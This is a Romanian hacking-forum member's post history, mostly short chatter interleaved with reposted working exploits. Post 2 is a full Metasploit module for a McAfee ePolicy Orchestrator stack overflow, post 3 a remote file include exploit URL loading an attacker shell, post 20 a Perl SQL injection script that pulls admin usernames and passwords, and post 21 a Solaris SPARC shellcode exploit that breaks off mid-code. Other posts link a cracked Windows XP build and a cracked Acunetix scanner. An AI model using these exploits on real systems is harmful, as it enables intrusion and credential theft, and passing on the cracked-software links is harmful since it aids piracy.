Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. hai sa mai facem inca cateva topicuri, mi-o intrat o musca-n casa.
  2. ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::mcafee_epolicy_source; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'muts <muts [at] remote-exploit.org>', 'xbxice[at]yahoo.com', 'H D Moore <hdm [at] metasploit.com>' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'win2000', 'win2003' ], 'Priv' => 0, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 81], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Payload' => { # Space is almost unlimited, but 1024 is fine for now 'Space' => 1024, 'BadChars' => "x00x09x0ax0bx0dx20x26x2bx3dx25x8cx3cxff", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0 and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1. This module is based on the exploit by xbxice and muts. }), 'Refs' => [ ['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ], ], 'DefaultTarget' => 0, 'Targets' => [ ['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll ], 'Keys' => ['epo'], 'DisclosureDate' => 'Jul 17 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; # Use a egghunter stub to find the payload my $eggtag = Pex::Text::AlphaNumText(4); my $egghunt = "x66x81xcaxffx0fx42x52x6ax02" . "x58xcdx2ex3cx05x5ax74xefxb8" . $eggtag . "x8bxfaxafx75xeaxafx75xe7xffxe7"; # Create the 64-byte GUID my $guid = Pex::Text::AlphaNumText(64); # Create the 260 byte Source header my $evil = Pex::Text::AlphaNumText(260); # # A long Source header results in a handful of exceptions. # The first exception occurs with a pointer at offset 116. # This exception occurs because a function pointer is # dereferenced from the overwritten data and then called: # naisp32!naSPIPE_MainWorkFunc+0x3ed: # mov ecx, [eax+0x270] (eax is offset 116) # push ecx # call [eax+0x26c] # # When this happens, the first SEH in the chain is also # overwritten at offset 96, so the exception results # in our code being called. If we knew of an address # in memory that pointed to our shellcode, we could # avoid the SEH completely and use the above call to # execute our code. This is actually practical, since # we can upload almost arbitrary amounts of data into # the heap and then overwrite the function pointer above. # # This method is left as an excercise to the reader. # # This module will use the SEH overwrite with a pop/pop/ret or # a jmp/call ebx (2000 only) to gain control of execution. This # removes the need for a large data upload and should result in # reliable execution without the need to brute force. # # Since the SEH method only leaves ~140 bytes of contiguous # shellcode space, we use an egghunter to find the real # payload that we stuffed into the heap as POST data. # # Trigger the exception by passing a bad pointer substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."xff"); # Return to pop/pop/ret or equivalent substr($evil, $target->[1], 4, pack('V', $target->[2])); # Jump to the egghunter substr($evil, $target->[1] - 4, 2, "xebx1a"); # Egghunter has 140 bytes of room to work substr($evil, $target->[1] + 24, length($egghunt), $egghunt); # Create our post data containing the shellcode my $data = Pex::Text::AlphaNumText(int(rand(500)+32)); # Embed the search tag and shellcode $data .= ($eggtag x 2) . $shellcode; # Add some extra padding $data .= Pex::Text::AlphaNumText(int(rand(500)+32)); my $req = "GET /spipe/pkg HTTP/1.0rn"; $req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0rn"; $req .="Content-Length: ". length($data). "rn"; $req .="AgentGuid=${guid}rn"; $req .="Source=${evil}rn"; $req .= "rn"; $req .= $data; $self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2])); my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $s->Send($req); $self->PrintLine("[*] Waiting up to two minutes for the egghunter..."); $s->Recv(-1, 120); $self->Handler($s); $s->Close; return; } Vulnerable Systems: * McAfee Epolicy version 3.5.0 * Protection Pilot version 1.1.0
  3. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpMyTeam v2.0 <= (smileys_dir) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by XORON(turkish hacker) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= URL: [url]http://www.phpscripts-fr.net/scripts/download.php?id=1627[/url] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Vuln. Code: $smiley_pack_path = $smileys_dir.$smiley_pack_name.'/'; @include($smiley_pack_path.'smileys.php'); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: /images/smileys/smileys_packs.php?smileys_dir=http://sh3LL? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # milw0rm.com [2006-10-05]
  4. Gonzalez

    Citeste aici !

    corect i_30 parca parca i se potriveste lu nos
  5. duteee ma!
  6. This release includes all hotfixes and security updates until September 2006. Only .NET Framework is not integrated. REPACK NOTES: Some minor problems with the install and the crack had been replaced with the original WGA file from MS. download: http://rapidshare.de/files/35287377/rb-xp2se2k6rp.part1.rar.html [url]http://rapidshare.de/files/35298006/rb-xp2se2k6rp.part2.rar.html[/url] [url]http://rapidshare.de/files/35304823/rb-xp2se2k6rp.part3.rar.html[/url]
  7. Conteaza ce ai in cap,si sa stii ce vrei! Daca vrei mai mult ,faci si pe dracu in 4 sa inveti! - parerea mea
  8. de acord cu i_30.Pun pariu cu oricare ca mai mult de jumate de pe acest forum inca is virgini,bine ... inafara de nos , dar ma refer la cei care au peste 15 ani.
  9. Credit: ppetru
  10. 10q juice astia cu posturi cred ca toti noi venitii stiu sa faca aproape orice! ata e ,nu ne-am nascut destepti
  11. Credit: B-Chris
  12. Codul Sursa: http://rapidshare.ro/download.php?id=2Je10cKWW7H9Mk8i1pyP Credit: ZOMBY
  13. Copyright © 1999 PRAGMA PHOBYA from HackDamage.
  14. Da_Boss ai incercat si ti-a scazut viteza ?
  15. Nu am incercat pt ca nu am wireless )) pt cei care au Credit: BlackKilla
  16. macar dai credit la IronGeek
  17. s-o luat dupa noi http://www.rst.void.ru/
  18. mersi Razvan
  19. Gonzalez

    Morgue 666

    nu e real,e o mare prostie,o pierdere de timp,oameni aia is posedati de diavol deaia fac pe nebunii... sa se bage in seama si sa faca impresii. trebuie impuscati...
  20. #!/usr/bin/perl # # Affected.scr..: Annuaire 1Two 2.2 # Poc.ID........: 09060902.txt # Type..........: SQL Injection (without quote) # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: [url]http://www.1two.org/[/url] # Poc.link......: acid-root.new.fr/poc/09060902.txt # Credits.......: DarkFig # # use LWP::UserAgent; use HTTP::Request; use Getopt::Long; use strict; print STDOUT "n+", '-' x 53, "+n"; print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |n"; print STDOUT '+', '-' x 53, "+n"; my($host,$path,$proxh,$proxu,$proxp,); my $opt = GetOptions( 'host=s' => $host, 'path=s' => $path, 'proxh=s' => $proxh, 'proxu=s' => $proxu, 'proxp=s' => $proxp); if(!$host) { print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n"; print STDOUT '+', '-' x 53, "+n"; exit(0); } if(!$path) {$path = '/';} if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} my @fi = ('username', 'password'); my $ur = $host.$path.'index.php?id='; my $ua = LWP::UserAgent->new(); $ua->agent('Mozilla XD'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; foreach(@fi) { my $xx = $_; my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin"); $re->proxy_authorization_basic($proxu, $proxp) if $proxp; my $xd = $ua->request($re); my $da = $xd->content; if($da =~ /- (.*?)</title>/) { if($xx eq 'username') { print STDOUT " [+]User:";} if($xx eq 'password') { print STDOUT " [+]Passwd:";} print STDOUT " $1n"; } else { print STDOUT "[!]Exploit failedn"; }} print STDOUT "+", '-' x 53, "+n"; exit(0);
  21. /* * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC * Copyright 2006 RISE Security <contact@risesecurity.org>, * Ramon de Carvalho Valle <ramon@risesecurity.org> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* * Compile with the following command. * $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c * * Set the DISPLAY environment variable to a X Window System server with * XKEYBOARD extension enabled. * $ ./sol-sparc-xkb sprintf|strcpy xserver:display * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <dlfcn.h> #include <link.h> #include <sys/systeminfo.h> #include <procfs.h> #define BUFSIZE 13+256+64+2+1 #define FRMSIZE 64+3+1 #define ADRSIZE 2047+1 #define SHLSIZE strlen(shellcode)+1 #define DSPSIZE strlen(display)+1 #define ARGSIZE 7+1 #define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE #define PFMSIZE strlen(platform)+1 #define PRGSIZE 20+1 #define PAD(a,b,c) a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8)))(a%8)?(12-(a%8)):4); char shellcode[]= /* 60 bytes */ "x90x1ax40x09" /* xor %o1,%o1,%o0 */ "x82x10x20x17" /* mov 0x17,%g1 */ "x91xd0x20x08" /* ta 0x08 */ "x21x0bxd8x9a" /* sethi %hi(0x2f62696e),%l0 */ "xa0x14x29x6e" /* or %l0,0x96e,%l0 */ "x23x0bxdcxda" /* sethi %hi(0x2f736800),%l1 */ "x90x23xa0x08" /* sub %sp,0x08,%o0 */ "x92x23xa0x10" /* sub %sp,0x10,%o1 */ "x94x1ax80x0a" /* xor %o2,%o2,%o2 */ "xe0x23xbfxf8" /* st %l0,[%sp-0x08] */ "xe2x23xbfxfc" /* st %l1,[%sp-0x04] */ "xd0x23xbfxf0" /* st %o0,[%sp-0x10] */ "xc0x23xbfxf4" /* st %g0,[%sp-0x0c] */ "x82x10x20x3b" /* mov 0x3b,%g1 */ "x91xd0x20x08" /* ta 0x08 */ ; void *find_symbol(const char *symbol){ void *handle,*addr; char *err; if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){ fprintf(stderr,"%sn",dlerror()); exit(EXIT_FAILURE); } dlerror(); addr=dlsym(handle,symbol); if((err=dlerror())!=NULL){ fprintf(stderr,"%sn",err); exit(EXIT_FAILURE); } dlclose(handle); return addr; } void *find_rwxmem(void){ FILE *fp; prmap_t map; int flags; void *addr; if((fp=fopen("/proc/self/map","rb"))==NULL){ perror("fopen"); exit(EXIT_FAILURE); } while(fread(&map,sizeof(map),1,fp)){ flags=map.pr_mflags; if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){ if(flags&MA_STACK) continue; addr=(void *)map.pr_vaddr; } } fclose(fp); return addr; } int main(int argc,char **argv){ char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p; int base,offset,i,flag=0; printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARCn"); printf("Copyright 2006 RISE Security <contact@risesecurity.org>nn"); if(argc!=3){ fprintf(stderr,"usage: %s sprintf|strcpy xserver:displayn",argv[0]); exit(EXIT_FAILURE); } if(!strcmp(argv[1],"sprintf")) flag=1; if(!strcmp(argv[1],"strcpy")) flag=2; if(!flag){ fprintf(stderr,"usage: %s sprintf|strcpy xserver:displayn",argv[0]); exit(EXIT_FAILURE); } snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]); if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){ perror("sysinfo"); exit(EXIT_FAILURE); } base=((int)argv[0]|0xffff); base++; offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE; PAD(offset,1,sizeof(envp)-1); *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE; *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE; *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE; switch(flag){ case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break; case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4; } *((int *)addr[4])=(int)find_rwxmem()+4; *((int *)addr[5])=*((int *)addr[4])-8; p=buf; sprintf(p,"_XKB_CHARSET="); p=buf+13; for(i=0;i<256;i++) *p++='A'; for(i=0;i<66;i++) *p++=addr[1][i%4]; *p='
  22. Foloseste Flashget sau download manager, nu folosi browserul Download: http://k1tk4t.gigcities.com/Acunetix.Web.Vulerability.Scanner.v4.0.Consultant.Edition.WinALL-TBE.rar
  23. Daca nu ai antivirus nu-l descarca... Download: http://rapidshare.de/files/17206225/phpBB_GUI.rar.html
×
×
  • Create New...